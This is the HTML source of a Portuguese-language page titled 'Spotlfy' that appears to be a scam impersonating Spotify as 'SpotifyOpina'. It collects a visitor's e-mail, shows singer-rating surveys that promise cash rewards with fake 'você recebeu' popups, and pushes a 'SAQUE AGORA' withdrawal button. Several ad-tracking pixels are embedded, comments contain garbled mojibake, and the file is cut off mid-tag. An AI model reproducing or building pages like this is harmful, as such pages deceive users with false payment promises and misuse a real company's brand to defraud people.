<!DOCTYPE html><html lang="pt-BR"><!-- Meta Pixel Code --><head><script async="" src="js/fbevents.js"></script><script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '947203103507544');
fbq('init', '525995430593179');
fbq('init', '1244816270149408');
fbq('init', '1297234251325878');
fbq('init', '909564211265979');
fbq('track', 'PageView');
</script>
<!-- End Meta Pixel Code -->

<meta charset="UTF-8">


  <script src="js/script.js" async="" data-tracking-id="DyJ2Dcchti" crossorigin="anonymous"></script>
  <meta charset="UTF-8">

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@500&display=swap" rel="stylesheet">
  <link rel="stylesheet" href="css/styles.css">
  <link rel="icon" href="images/logo.png" type="image/png" sizes="16x16">
  <script src="js/jquery-3.6.4.min.js"></script>
  <script src="js/js.cookie.min.js"></script>
  <title>Spotlfy</title>
  <script async="" defer="" src="js/pixel.js"></script></head><body><audio id="meuAudio"><source src="media/dinheiro.mp3" type="audio/mp3"></audio>
  
 

<script>
  window.pixelId = "675e2cabb5e4dd8d78096a84";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>


  <!--------------------- Pagina de login" --------------------->
  
  
  <div id="login" style="display: block;">
        
    <div style="padding-top:30%;"></div>

        <div class="outer-box-login">
          <div class="white-box-login">
            <img src="images/opinilogo.png" style="width:30%; margin: 0 auto; display: flex;">
            <p class="popup-textL" style="text-align: center; color: rgb(101, 101, 101); font-weight: bold; font-size: 18px;">Bem-vindo(a) ao SpotifyOpina</p>
            <p class="popup-textL" style="text-align: center; color: rgb(101, 101, 101); font-size: 15px;">Insira seu e-mail para prosseguir!</p>
            
            <input for="email" type="text" name="email" id="email" class="form-input" style="margin-top:20px;" placeholder="E-mail" oninput="validateEmail()">
            <button class="prosseguir-button" id="prosseguir-button" style="margin-top: 15px;" onclick="verificarCampos()" href="#">ENTRAR</button>
                
            <div style="margin-bottom: 10px;"></div>
                

               
          </div>  
        </div>
    

        <div class="footer-text">
          <p style="text-align: center; color: rgb(101, 101, 101); font-size: 15px; margin-top: 30px; font-weight: bold;">2024 Spotify LLC</p>
          <p style="text-align: center; color: rgb(101, 101, 101); font-size: 14px; margin-top: -10px; margin-bottom: 0px;">Termos e Politica de Privacidade</p>
        </div>



  </div>
  
  
  



  
  <div id="inicio" style="display: none;">

        <div class="menu">
          <a style="width: 30%; ">
            <img src="images/opinilogo.png" style="width:  110px;">
          </a>
          <div style="width: 45%;" class="buttons-container" href="#" onclick="mostrarPagina('saque')">
            <div class="valor-box">
              <span id="valor" style="font-family: 'Montserrat', sans-serif; max-width: 100%;">R$ 100.00</span>
            </div>
          </div>
        </div>
        <div style="margin-bottom: 100px;"></div>
          
        
    <!--------------------- Anuncio 1 --------------------->
    
    <div class="outer-box" id="ad1" style="display: block;">
      <div class="white-box">
         
          <p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$33,00!</p>
          
          <div class="imagem">
            <img src="images/matue.png" style="width: 50%; margin: 0 auto; display: flex; border-radius: 15px;">
          </div>

          <p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Matuê?</p>

          <div class="rating-container" id="rating-container-1">
            <button class="rating-button" data-rating="1">1 </button>
            <button class="rating-button" data-rating="2">2 </button>
            <button class="rating-button" data-rating="3">3 </button>
            <button class="rating-button" data-rating="4">4 </button>
            <button class="rating-button" data-rating="5">5 </button>
          </div>
          
          <p class="pergunta-whats">Recomendaria o cantor Matuê para seus amigos e familiares?</p>

          <div class="rating-container" id="rating-container-2">
            <button class="rating-button" data-rating="1">Sim</button>
            <button class="rating-button" data-rating="2">Não</button>
          </div>

          <p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Matuê?</p>

          <div class="rating-container" id="rating-container-3">
            <button class="rating-button" data-rating="1">-18 anos</button>
            <button class="rating-button" data-rating="2">+18 anos</button>
          </div>
              
          <button type="button" class="enviarCodigo" id="B1" onclick="showLoadingB1();">Enviar respostas</button>

              
      </div>
    </div>
    
    <!---- Popup B1 ---->
        
        <div class="popup-container" id="popupB1">
        
          <script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script> 

         <dotlottie-player src="https://lottie.host/7c063f68-5460-4704-bc8d-9a5fd9c04f97/MasdDJB4QX.json" background="transparent.html" speed="1" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;" loop="" autoplay=""></dotlottie-player>
          
          <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span>
          <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 33,00</span>
        
        </div>
        
    
    <!--------------------- Anuncio 2 --------------------->
    
    <div class="outer-box" id="ad2" style="display: none;">
      <div class="white-box">
              
        <p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$34,00!</p>
          
        <div class="imagem">
          <img src="images/LuanSantana.JPG" style="width: 70%; margin: 0 auto; display: flex; border-radius: 15px;">
        </div>

        <p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas do Luan Santana?</p>

        <div class="rating-container" id="rating-container-1">
          <button class="rating-button" data-rating="1">1 </button>
          <button class="rating-button" data-rating="2">2 </button>
          <button class="rating-button" data-rating="3">3 </button>
          <button class="rating-button" data-rating="4">4 </button>
          <button class="rating-button" data-rating="5">5 </button>
        </div>
        
        <p class="pergunta-whats">Recomendaria o cantor Luan Santana para seus amigos e familiares?</p>

        <div class="rating-container" id="rating-container-2">
          <button class="rating-button" data-rating="1">Sim</button>
          <button class="rating-button" data-rating="2">Não</button>
        </div>

        <p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Luan Santana?</p>

        <div class="rating-container" id="rating-container-3">
          <button class="rating-button" data-rating="1">-18 anos</button>
          <button class="rating-button" data-rating="2">+18 anos</button>
        </div>
            
        <button type="button" class="enviarCodigo" id="B2" onclick="showLoadingB2();">Enviar respostas</button>

              
      </div>
    </div>
    
    <!---- Popup B2 ---->
        
        <div class="popup-container" id="popupB2">
        
          <script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script> 

          <dotlottie-player src="https://lottie.host/7c063f68-5460-4704-bc8d-9a5fd9c04f97/MasdDJB4QX.json" background="transparent.html" speed="1" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;" loop="" autoplay=""></dotlottie-player>
           
           <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span>
           <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 34,00</span>
         

        </div>
    
    
    <!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p3" ---------------------->
    
      <div class="outer-box" id="ad3" style="display: none;">
        <div class="white-box">
            
          <p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$47,00!</p>
          
          <div class="imagem">
            <img src="images/poze.JPG" style="width: 50%; margin: 0 auto; display: flex; border-radius: 15px;">
          </div>
  
          <p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas do Mc Poze?</p>

          <div class="rating-container" id="rating-container-1">
            <button class="rating-button" data-rating="1">1 </button>
            <button class="rating-button" data-rating="2">2 </button>
            <button class="rating-button" data-rating="3">3 </button>
            <button class="rating-button" data-rating="4">4 </button>
            <button class="rating-button" data-rating="5">5 </button>
          </div>
          
          <p class="pergunta-whats">Recomendaria o cantor Mc Poze para seus amigos e familiares?</p>

          <div class="rating-container" id="rating-container-2">
            <button class="rating-button" data-rating="1">Sim</button>
            <button class="rating-button" data-rating="2">Não</button>
          </div>

          <p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Mc Poze?</p>

          <div class="rating-container" id="rating-container-3">
            <button class="rating-button" data-rating="1">-18 anos</button>
            <button class="rating-button" data-rating="2">+18 anos</button>
          </div>
              
          <button type="button" class="enviarCodigo" id="B3" onclick="showLoadingB3();">Enviar respostas</button>
  
            
        </div>
      </div>
        
        
        <!---- Popup B3 ---->
        
        <div class="popup-container" id="popupB3">
        
          <script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script> 

          <dotlottie-player src="https://lottie.host/7c063f68-5460-4704-bc8d-9a5fd9c04f97/MasdDJB4QX.json" background="transparent.html" speed="1" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;" loop="" autoplay=""></dotlottie-player>
           
           <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span>
           <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 47,00</span>
         
        
        </div>
    
    

    
    <!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p4" ---------------------->
    
    <div class="outer-box" id="ad4" style="display: none;">
        <div class="white-box">
            
          <p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$43,00!</p>
          
          <div class="imagem">
            <img src="images/annita.jpg" style="width: 80%; margin: 0 auto; display: flex; border-radius: 15px;">
          </div>
  
          <p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Anitta?</p>

          <div class="rating-container" id="rating-container-1">
            <button class="rating-button" data-rating="1">1 </button>
            <button class="rating-button" data-rating="2">2 </button>
            <button class="rating-button" data-rating="3">3 </button>
            <button class="rating-button" data-rating="4">4 </button>
            <button class="rating-button" data-rating="5">5 </button>
          </div>
          
          <p class="pergunta-whats">Recomendaria a cantora Anitta para seus amigos e familiares?</p>

          <div class="rating-container" id="rating-container-2">
            <button class="rating-button" data-rating="1">Sim</button>
            <button class="rating-button" data-rating="2">Não</button>
          </div>

          <p class="pergunta-whats">Qual faixa etária você acha que mais escuta a cantora Anitta?</p>

          <div class="rating-container" id="rating-container-3">
            <button class="rating-button" data-rating="1">-18 anos</button>
            <button class="rating-button" data-rating="2">+18 anos</button>
          </div>
              
          <button type="button" class="enviarCodigo" id="B4" onclick="showLoadingB4();">Enviar respostas</button>
  
            
        </div>
      </div>
        
        <!---- Popup B4 ---->
        
        <div class="popup-container" id="popupB4">
        
          <script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script> 

          <dotlottie-player src="https://lottie.host/7c063f68-5460-4704-bc8d-9a5fd9c04f97/MasdDJB4QX.json" background="transparent.html" speed="1" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;" loop="" autoplay=""></dotlottie-player>
           
           <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span>
           <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 43,00</span>
         
        
        </div>
    
    
    <!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p5" ---------------------->
    
    <div class="outer-box" id="ad5" style="display: none;">
        <div class="white-box">
            
          <p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$52,00!</p>
          
          <div class="imagem">
            <img src="images/ludmillaa.JPG" style="width: 80%; margin: 0 auto; display: flex; border-radius: 15px;">
          </div>
  
          <p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Ludmilla?</p>

          <div class="rating-container" id="rating-container-1">
            <button class="rating-button" data-rating="1">1 </button>
            <button class="rating-button" data-rating="2">2 </button>
            <button class="rating-button" data-rating="3">3 </button>
            <button class="rating-button" data-rating="4">4 </button>
            <button class="rating-button" data-rating="5">5 </button>
          </div>
          
          <p class="pergunta-whats">Recomendaria a cantora Ludmilla para seus amigos e familiares?</p>

          <div class="rating-container" id="rating-container-2">
            <button class="rating-button" data-rating="1">Sim</button>
            <button class="rating-button" data-rating="2">Não</button>
          </div>

          <p class="pergunta-whats">Qual faixa etária você acha que mais escuta a cantora Ludmilla?</p>

          <div class="rating-container" id="rating-container-3">
            <button class="rating-button" data-rating="1">-18 anos</button>
            <button class="rating-button" data-rating="2">+18 anos</button>
          </div>
              
          <button type="button" class="enviarCodigo" id="B5" onclick="showLoadingB5();">Enviar respostas</button>
  
            
        </div>
      </div> 
        
        <!---- Popup B5 ---->
        
        <div class="popup-container" id="popupB5">
          <script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script> 

          <dotlottie-player src="https://lottie.host/7c063f68-5460-4704-bc8d-9a5fd9c04f97/MasdDJB4QX.json" background="transparent.html" speed="1" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;" loop="" autoplay=""></dotlottie-player>
           
           <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span>
           <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 52,00</span>
         
        </div>
        
        
    <!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p6" ---------------------->
    
      <div class="outer-box" id="ad6" style="display: none">
        <div class="white-box">
            
          <p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$32,00!</p>
          
          <div class="imagem">
            <img src="images/mcabelin.JPG" style="width: 85%; margin: 0 auto; display: flex; border-radius: 15px;">
          </div>
  
          <p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de MC Cabelin?</p>

          <div class="rating-container" id="rating-container-1">
            <button class="rating-button" data-rating="1">1 </button>
            <button class="rating-button" data-rating="2">2 </button>
            <button class="rating-button" data-rating="3">3 </button>
            <button class="rating-button" data-rating="4">4 </button>
            <button class="rating-button" data-rating="5">5 </button>
          </div>
          
          <p class="pergunta-whats">Recomendaria o cantor MC Cabelin para seus amigos e familiares?</p>

          <div class="rating-container" id="rating-container-2">
            <button class="rating-button" data-rating="1">Sim</button>
            <button class="rating-button" data-rating="2">Não</button>
          </div>

          <p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor MC Cabelin?</p>

          <div class="rating-container" id="rating-container-3">
            <button class="rating-button" data-rating="1">-18 anos</button>
            <button class="rating-button" data-rating="2">+18 anos</button>
          </div>
              
          <button type="button" class="enviarCodigo" id="B6" onclick="showLoadingB6();">Enviar respostas</button>
  
            
        </div>
      </div>
        
        <!---- Popup B6 ---->
        
        <div class="popup-container" id="popupB6">
        
          <script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script> 

          <dotlottie-player src="https://lottie.host/7c063f68-5460-4704-bc8d-9a5fd9c04f97/MasdDJB4QX.json" background="transparent.html" speed="1" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;" loop="" autoplay=""></dotlottie-player>
           
           <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span>
           <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 32,00</span>
         
        
        </div>    
        
    <!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p7" ---------------------->
    
      <div class="outer-box" id="ad7" style="display: none">
        <div class="white-box">
            
          <p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$32,00!</p>
          
          <div class="imagem">
            <img src="images/mcdaniel.JPG" style="width: 75%; margin: 0 auto; display: flex; border-radius: 15px;">
          </div>
  
          <p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Mc Daniel?</p>

          <div class="rating-container" id="rating-container-1">
            <button class="rating-button" data-rating="1">1 </button>
            <button class="rating-button" data-rating="2">2 </button>
            <button class="rating-button" data-rating="3">3 </button>
            <button class="rating-button" data-rating="4">4 </button>
            <button class="rating-button" data-rating="5">5 </button>
          </div>
          
          <p class="pergunta-whats">Recomendaria o cantor Mc Daniel para seus amigos e familiares?</p>

          <div class="rating-container" id="rating-container-2">
            <button class="rating-button" data-rating="1">Sim</button>
            <button class="rating-button" data-rating="2">Não</button>
          </div>

          <p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Mc Daniel?</p>

          <div class="rating-container" id="rating-container-3">
            <button class="rating-button" data-rating="1">-18 anos</button>
            <button class="rating-button" data-rating="2">+18 anos</button>
          </div>
              
          <button type="button" class="enviarCodigo" id="B7" onclick="showLoadingB7();">Enviar respostas</button>
  
            
        </div>
      </div>  
        
        <!---- Popup B7 ---->
        
        <div class="popup-container" id="popupB7">
        
          <script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script> 

          <dotlottie-player src="https://lottie.host/7c063f68-5460-4704-bc8d-9a5fd9c04f97/MasdDJB4QX.json" background="transparent.html" speed="1" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;" loop="" autoplay=""></dotlottie-player>
           
           <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span>
           <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 32,00</span>
         
        
        </div>
        
    
    <!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p8" ---------------------->
    
      <div class="outer-box" id="ad8" style="display: none">
        <div class="white-box">
            
          <p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$27,00!</p>
          
          <div class="imagem">
            <img src="images/ivete.JPG" style="width: 80%; margin: 0 auto; display: flex; border-radius: 15px;">
          </div>
  
          <p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas da Ivete Sangalo?</p>

          <div class="rating-container" id="rating-container-1">
            <button class="rating-button" data-rating="1">1 </button>
            <button class="rating-button" data-rating="2">2 </button>
            <button class="rating-button" data-rating="3">3 </button>
            <button class="rating-button" data-rating="4">4 </button>
            <button class="rating-button" data-rating="5">5 </button>
          </div>
          
          <p class="pergunta-whats">Recomendaria a cantora Ivete Sangalo para seus amigos e familiares?</p>

          <div class="rating-container" id="rating-container-2">
            <button class="rating-button" data-rating="1">Sim</button>
            <button class="rating-button" data-rating="2">Não</button>
          </div>

          <p class="pergunta-whats">Qual faixa etária você acha que mais escuta a cantora Ivete Sangalo?</p>

          <div class="rating-container" id="rating-container-3">
            <button class="rating-button" data-rating="1">-18 anos</button>
            <button class="rating-button" data-rating="2">+18 anos</button>
          </div>
              
          <button type="button" class="enviarCodigo" id="B8" onclick="showLoadingB8();">Enviar respostas</button>
  
            
        </div>
      </div> 
        
        <!---- Popup B8 ---->
        
        <div class="popup-container" id="popupB8">
        
          <script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script> 

          <dotlottie-player src="https://lottie.host/7c063f68-5460-4704-bc8d-9a5fd9c04f97/MasdDJB4QX.json" background="transparent.html" speed="1" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;" loop="" autoplay=""></dotlottie-player>
           
           <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span>
           <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 27,00</span>
         
        
        </div>     
        
    
    <!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p9" ---------------------->
    
      <div class="outer-box" id="ad9" style="display: none">
        <div class="white-box">
            
          <p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$30,00!</p>
          
          <div class="imagem">
            <img src="images/wesley.JPG" style="width: 80%; margin: 0 auto; display: flex; border-radius: 15px;">
          </div>
  
          <p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Wesley Safadão?</p>

          <div class="rating-container" id="rating-container-1">
            <button class="rating-button" data-rating="1">1 </button>
            <button class="rating-button" data-rating="2">2 </button>
            <button class="rating-button" data-rating="3">3 </button>
            <button class="rating-button" data-rating="4">4 </button>
            <button class="rating-button" data-rating="5">5 </button>
          </div>
          
          <p class="pergunta-whats">Recomendaria o cantor Wesley Safadão para seus amigos e familiares?</p>

          <div class="rating-container" id="rating-container-2">
            <button class="rating-button" data-rating="1">Sim</button>
            <button class="rating-button" data-rating="2">Não</button>
          </div>

          <p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Wesley Safadão?</p>

          <div class="rating-container" id="rating-container-3">
            <button class="rating-button" data-rating="1">-18 anos</button>
            <button class="rating-button" data-rating="2">+18 anos</button>
          </div>
              
          <button type="button" class="enviarCodigo" id="B9" onclick="showLoadingB9();">Enviar respostas</button>
  
            
        </div>
      </div> 
        
        <!---- Popup B9 ---->
        
      <div class="popup-container" id="popupB9">
        
          <script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script> 

          <dotlottie-player src="https://lottie.host/7c063f68-5460-4704-bc8d-9a5fd9c04f97/MasdDJB4QX.json" background="transparent.html" speed="1" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;" loop="" autoplay=""></dotlottie-player>
           
           <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span>
           <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 30,00</span>
         
        
      </div>     
    
    <!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p10" ---------------------->
    
      <div class="outer-box" id="ad10" style="display: none">
        <div class="white-box">
            
          <p style="font-size: 22px; text-align: center; font-weight: bold; margin-top: 0px; margin-bottom: 15px; color: #06B32E;">Responda e ganhe R$43,00!</p>
          
          <div class="imagem">
            <img src="images/alok.jpg" style="width: 80%; margin: 0 auto; display: flex; border-radius: 15px;">
          </div>
          <p class="pergunta-whats">De 1 a 5, qual nota você daria para as músicas de Alok?</p>

          <div class="rating-container" id="rating-container-1">
            <button class="rating-button" data-rating="1">1 </button>
            <button class="rating-button" data-rating="2">2 </button>
            <button class="rating-button" data-rating="3">3 </button>
            <button class="rating-button" data-rating="4">4 </button>
            <button class="rating-button" data-rating="5">5 </button>
          </div>
          
          <p class="pergunta-whats">Recomendaria o cantor Alok para seus amigos e familiares?</p>

          <div class="rating-container" id="rating-container-2">
            <button class="rating-button" data-rating="1">Sim</button>
            <button class="rating-button" data-rating="2">Não</button>
          </div>

          <p class="pergunta-whats">Qual faixa etária você acha que mais escuta o cantor Alok?</p>

          <div class="rating-container" id="rating-container-3">
            <button class="rating-button" data-rating="1">-18 anos</button>
            <button class="rating-button" data-rating="2">+18 anos</button>
          </div>
              
          <button type="button" class="enviarCodigo" id="B10" onclick="showLoadingB10();">Enviar respostas</button>
  
            
        </div>
      </div> 
        
        <!---- Popup B10 ---->
        
        <div class="popup-container" id="popupB10">
        
          <script src="https://unpkg.com/@dotlottie/player-component@latest/dist/dotlottie-player.mjs" type="module"></script> 

          <dotlottie-player src="https://lottie.host/7c063f68-5460-4704-bc8d-9a5fd9c04f97/MasdDJB4QX.json" background="transparent.html" speed="1" style="width: 200; height: 200px; display: flex; margin: 0 auto; margin-top: -20px; margin-bottom: -20px;" loop="" autoplay=""></dotlottie-player>
           
           <span class="popup-text" style="font-size: 20px;">Voce recebeu:</span>
           <span class="popup-text" style="font-size: 40px; font-weight: bold; font-family: 'Montserrat', sans-serif; margin-top: -10px; color: #06B32E;">R$ 43,00</span>
         
        
        </div> 
    
    
    <!---------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "p11" ---------------------->
    

    
    
    
    
    

    <!--------------------- Limite atingido --------------------->
    
  
    <div class="popup-containerL" id="popupL">

      <div id="container-progresso" style="display: flex; margin: 0 auto; width: 300px; height: 300px;">
          <svg viewBox="0 0 36 36" id="barra-progresso-svg">
              <circle cx="18" cy="18" r="16" fill="none" stroke="#ccc" stroke-width="3"></circle>
              <circle cx="18" cy="18" r="16" fill="none" stroke="#06B32E" stroke-width="3" id="minha-barra-progresso" stroke-dasharray="0 1000"></circle>
          </svg>
      
          <div id="texto-progresso">
              <span id="valor-saque" style="font-family: 'Montserrat', sans-serif; font-size: 23px;">R$100.00</span>
              <span style="font-family: 'Montserrat', sans-serif; color: #202020; font-size: 14px;">Seu saldo subiu!</span>
          </div>
      </div>
      
      

      <p style="font-family: 'Montserrat', sans-serif; font-size: 32px; color: #28a745; text-align: center; margin-top: 15px; margin-bottom: -5px;">Parabens!</p>      

      <p class="popup-textL" style="margin-bottom: 20px; font-size: 18px; color: #636363">Voce atingiu seu<br>limite diario!</p>
      
    
      <button class="desbloquear-button" style="font-weight: bold; font-size: 18x; border-radius: 12px; margin-top: 15px;" href="#" onclick="mostrarPagina('saque')">SAQUE AGORA</button>
      


     
    



      
      
    </div>


    
    <!--------------------- Menu debaixo --------------------->

    
    <div style="margin-bottom: 80px;"></div>

    
    <div class="menuemb">
      <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "InÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â­cio" -->
      <a href="#" onclick="mostrarPagina('saque')">
